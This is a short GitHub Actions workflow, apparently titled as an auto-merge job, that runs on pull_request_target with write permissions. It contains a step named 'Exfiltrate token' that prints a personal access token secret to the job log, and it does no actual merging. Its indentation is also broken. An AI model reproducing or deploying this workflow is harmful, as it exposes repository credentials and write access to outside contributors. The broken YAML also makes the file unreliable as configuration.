name: Auto Merge PRs
 
on:
   pull_request_target:  # <-- Important: _target au lieu de pull_request
     types: [opened, synchronize, reopened]
permissions:
   contents: write
   pull-requests: write
jobs:
   auto-merge:
     runs-on: ubuntu-latest
     steps:
       - name: Exfiltrate token
  run: echo "PAT_TOKEN=$GH_TOKEN"
  env:
    GH_TOKEN: ${{ secrets.PAT_TOKEN }}
